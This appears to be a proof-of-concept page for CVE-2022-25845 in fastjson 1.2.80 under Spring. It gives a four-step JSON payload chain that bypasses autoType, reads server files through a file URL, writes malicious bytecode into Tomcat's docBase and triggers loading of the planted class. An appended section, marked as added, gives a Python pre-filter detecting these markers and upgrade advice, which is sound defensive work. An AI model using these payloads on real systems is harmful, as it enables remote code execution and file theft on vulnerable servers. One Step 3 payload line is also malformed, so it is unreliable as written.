POC details: 2941fa39d403266a8b9de7e6359c55745b63dce1

Source
Related vulnerability
Title: Fastjson code issue vulnerability (CVE-2022-25845)
Description: Fastjson is a fast Java-based JSON parser/generator. Versions of Fastjson before 1.2.83 contain a security vulnerability: the default autoType-off restriction can be bypassed to deserialize untrusted data, which an attacker can use to attack a remote server.
Description
CVE-2022-25845 (fastjson 1.2.80) exploit in a Spring environment!
Introduction
# CVE-2022-25845-In-Spring

# Main dependencies
1. jackson
2. commons-io

# Quick reproduction

1. Import the project into IDEA and build it with `mvn install`
2. Build and run the Dockerfile: `docker build .`
3. Run `src/test/java/POC.java`, which executes the `touch /tmp/pwned` command


# Exploitation walkthrough

## Step 1: Add java.io.InputStream to the fastjson autoType cache

```json
{
  "a": "{    \"@type\": \"java.lang.Exception\",    \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\",    \"p\": {    }  }",
  "b": {
    "$ref": "$.a.a"
  },
  "c": "{  \"@type\": \"com.fasterxml.jackson.core.JsonParser\",  \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",  \"in\": {}}",
  "d": {
    "$ref": "$.c.c"
  }
}
```

![Screenshot 2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)

## Step 2: Read the contents of /tmp via the file protocol to obtain the Tomcat docBase directory name

> The contents are read one byte at a time

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.BOMInputStream",
      "delegate": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "jdk.nashorn.api.scripting.URLReader",
          "url": "${file}"
        },
        "charsetName": "UTF-8",
        "bufferSize": "1024"
      },
      "boms": [
        {
          "charsetName": "UTF-8",
          "bytes": ${data}
        }
      ]
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [1]
      }
    ]
  },
  "b": {"$ref":"$.a.delegate"}
}
```

![Screenshot 2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)

## Step 3: Write the malicious bytecode into the docBase directory

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.CharSequenceInputStream",
        "cs": {
          "@type": "java.lang.String"
          "${shellcode}",
          "charset": "iso-8859-1",
          "bufferSize": ${size}
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file2write}",
            "charset": "iso-8859-1",
            "append": true
          },
          "charset": "iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
    "b": {
      "@type": "java.io.InputStream",
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "org.apache.commons.io.input.XmlStreamReader",
        "inputStream": {
          "$ref": "$.a"
        },
        "httpContentType": "text/xml",
        "lenient": false,
        "defaultEncoding": "iso-8859-1"
      },
      "charsetName": "iso-8859-1",
      "bufferSize": 1024
    },
    "c": {}
  }
}
```

![Screenshot 2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)

## Step 4: Trigger loading of the malicious class

```json
{
  "@type":"java.lang.Exception",
  "@type":"com.chenzai.HackException"
}
```

![Screenshot 2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)
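Every step of the chain above is carried by the same small set of fastjson features: `@type` keys (twice in one object, so that the first value is checked and the second is used), `$ref` path references that re-use an already deserialized object, and whole JSON documents smuggled inside string values (Step 1) so that a nested `@type` never appears at the top level. The following pre-filter is an added example for the defending side; it is not code from this PoC repository. It parses a request body while keeping duplicate keys, descends into string values that themselves parse as JSON, and reports every marker it finds. The class allowlist (`ALLOWED_TYPES`) and the `org.example.Order` name in it are assumptions of this example; the sample bodies are constructed from the shapes shown in Steps 1 and 4.

```python
"""Pre-filter for fastjson-bound request bodies (added example, not part of the PoC).

Reports the three autoType markers used by the chain above:
  * "@type" keys, including several "@type" keys in one object,
  * "$ref" path references,
  * JSON documents embedded inside string values (nested "@type" smuggling).
"""
import json
from typing import Any, List

# Assumption of this example: the only concrete class the endpoint may name.
ALLOWED_TYPES = frozenset({"org.example.Order"})


class _Obj(list):
    """A JSON object kept as an ordered list of (key, value) pairs.

    json.loads normally collapses duplicate keys (last one wins), which would
    hide the duplicate-"@type" trick; keeping the raw pairs preserves it.
    """


def _try_parse(text: str):
    try:
        return json.loads(text, object_pairs_hook=_Obj)
    except (ValueError, TypeError):
        return None


def scan(value: Any, path: str = "$") -> List[str]:
    """Walk a parsed document and return one finding string per marker."""
    findings: List[str] = []
    if isinstance(value, _Obj):  # must be tested before list: _Obj is a list
        type_values = [v for k, v in value if k == "@type"]
        if len(type_values) > 1:
            findings.append(f"{path}: {len(type_values)} '@type' keys in one object (duplicate-key trick)")
        for t in type_values:
            if t not in ALLOWED_TYPES:
                findings.append(f"{path}: '@type' names non-allowlisted class {t!r}")
        for k, v in value:
            if k == "$ref":
                findings.append(f"{path}: '$ref' path reference {v!r}")
            findings.extend(scan(v, f"{path}.{k}"))
    elif isinstance(value, list):
        for i, item in enumerate(value):
            findings.extend(scan(item, f"{path}[{i}]"))
    elif isinstance(value, str):
        stripped = value.lstrip()
        if stripped.startswith("{") or stripped.startswith("["):
            nested = _try_parse(stripped)
            if nested is not None:
                findings.append(f"{path}: JSON document embedded in a string value")
                findings.extend(scan(nested, f"{path}<embedded>"))
    return findings


def scan_body(text: str) -> List[str]:
    """Scan a raw request body; an unparseable body is itself a finding."""
    doc = _try_parse(text)
    if doc is None:
        return ["$: body is not parseable as JSON"]
    return scan(doc)


def is_suspicious(text: str) -> bool:
    return bool(scan_body(text))


# Constructed samples, shaped like the Step 1 and Step 4 payloads above.
SAMPLE_STEP1_STYLE = r'''{
  "a": "{\"@type\": \"java.lang.Exception\", \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\", \"p\": {}}",
  "b": {"$ref": "$.a.a"}
}'''
SAMPLE_STEP4_STYLE = '{"@type":"java.lang.Exception","@type":"com.chenzai.HackException"}'
SAMPLE_BENIGN = '{"@type":"org.example.Order","id":7,"tags":["a","b"]}'

if __name__ == "__main__":
    for name, body in [("step1", SAMPLE_STEP1_STYLE), ("step4", SAMPLE_STEP4_STYLE), ("benign", SAMPLE_BENIGN)]:
        print(f"--- {name}: suspicious={is_suspicious(body)}")
        for line in scan_body(body):
            print("  " + line)
```

Run in front of `JSON.parseObject` (or as a WAF/gateway rule), a non-empty result is a reason to reject the body and log it. The filter is a compensating control only; the fix is upgrading to fastjson 1.2.83 or later, and on any version from 1.2.68 onward enabling safeMode (`-Dfastjson.parser.safeMode=true` or `ParserConfig.getGlobalInstance().setSafeMode(true)`), which disables autoType entirely rather than relying on the deny-list this chain bypasses.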

# References / Acknowledgements

- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw

File snapshot

```
[4.0K] /data/pocs/2941fa39d403266a8b9de7e6359c55745b63dce1
├── [ 143] Dockerfile
├── [4.0K] images
│   ├── [646K] 截屏2024-11-07 21.34.52.png
│   ├── [658K] 截屏2024-11-07 21.35.19.png
│   ├── [486K] 截屏2024-11-07 21.35.32.png
│   ├── [382K] 截屏2024-11-07 21.35.56.png
│   ├── [349K] 截屏2024-11-07 21.36.27.png
│   └── [389K] 截屏2024-11-07 21.37.04.png
├── [4.0K] payloads
│   ├── [ 365] step1.json
│   ├── [ 695] step2.json
│   ├── [1.3K] step3.json
│   └── [  74] step4.json
├── [1.9K] pom.xml
├── [3.4K] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   └── [4.0K] java
    │       └── [4.0K] org
    │           └── [4.0K] example
    │               ├── [ 285] App.java
    │               └── [4.0K] controller
    │                   └── [ 349] JSONController.java
    └── [4.0K] test
        └── [4.0K] java
            └── [4.8K] POC.java

10 directories, 16 files
```